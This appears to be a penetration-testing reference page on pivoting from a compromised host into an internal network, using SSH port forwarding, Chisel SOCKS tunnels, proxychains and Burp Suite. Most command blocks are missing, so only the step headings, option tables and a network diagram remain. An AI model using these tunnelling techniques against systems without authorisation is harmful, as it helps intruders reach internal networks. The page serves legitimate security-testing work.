Edit

Pivoting

Network setup

The following sections rely on this network setup.

┌──────────────┐          ┌──────────────┐            ┌──────────────┐
│ attacking    │          │ compromised  │            │ target       │
│ machine      │          │ machine      │            │ machine      │
│ (local)      │          │ (pivot)      │            │ (target)     │
│              │          │              │            │              │
│  10.10.10.2 ◄┼──public──┼► 10.10.10.5  │            │              │
│              │          │              │            │              │
│              │          │  172.16.0.5 ◄┼──internal──┼► 172.16.0.10 │
│              │          │              │            │              │
└──────────────┘          └──────────────┘            └──────────────┘
Machine name
Short name
User

Attacking Machine

local

me

Compromised Machine

pivot

victim

Target Machine

target

-

SSH

Common options

option
description

-L

Forward connection (Local port forwarding)

-R

Reverse connection (Remote port forwarding)

-D

Socks proxy (Dynamic port forwarding)

-f

Immediately background the shell

-N

Only establish the connection, don't execute any commands

Forward connection (Local port forwarding)

Setup a local port forward to the target.

Execute command

Reverse connection (Remote port forwarding)

As we will connect back from the target (network) to our own machine, we need to take some precautions to ensure our safety.

  1. Generate a new ssh key pair

  1. Add public key to authorized_keys with following restrictions

  1. Check ssh server status

  1. Start ssh server (if not already running)

  1. Copy the private key over to the pivot ⚠️ Normally we would never give away our private key, but that's why we're using a new throwaway key pair here! ⚠️

Setup a remote port forward from the pivot.

Execute command (example)

Socks proxy (Dynamic port forwarding)

Setup a proxy that forwards any tcp port to any target.

proxychains.conf (see also below)

Execute command (example)

Socks proxy (reverse)

Chisel

A fast TCP/UDP tunnel over HTTP GitHub - jpillora/chisel

Port forwarding

Start server (local)

Start client (pivot)

Execute command (example)

SOCKS proxy

Start server (local)

Start client (pivot)

Note: <socks-port> defaults to 1080, if left out.

Execute command (example)

Double pivot (via SOCKS proxies)

Start server (local)

Start client (pivot1)

Start another server (pivot1)

Start another client (pivot2)

Add another proxy to proxychains.conf (more details on proxychains, see below)

Execute command (example)

Verify

E.g.

proxychains

A tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. GitHub - haad/proxychains: proxychains

Config file

Proxychains looks for configuration in the following order:

  1. Env

  2. -f proxychains.conf

  3. ./proxychains.conf

  4. ~/.proxychains/proxychains.conf

  5. /etc/proxychains.conf

Run command via proxychains

Burp Suite

To use Burp Suite in this setup, just configure the socks proxy there.

Project options or User optionsSOCKS Proxy☑️ Use SOCKS Proxy

  • SOCKS proxy host: 127.0.0.1

  • SOCKS proxy port: 1080

⚠️ Keep your browser pointing to Burp Suites' proxy as usual! ⚠️

Foxy Proxy

See Firefox extensions

PreviousLootNextStandalone Tools

Last updated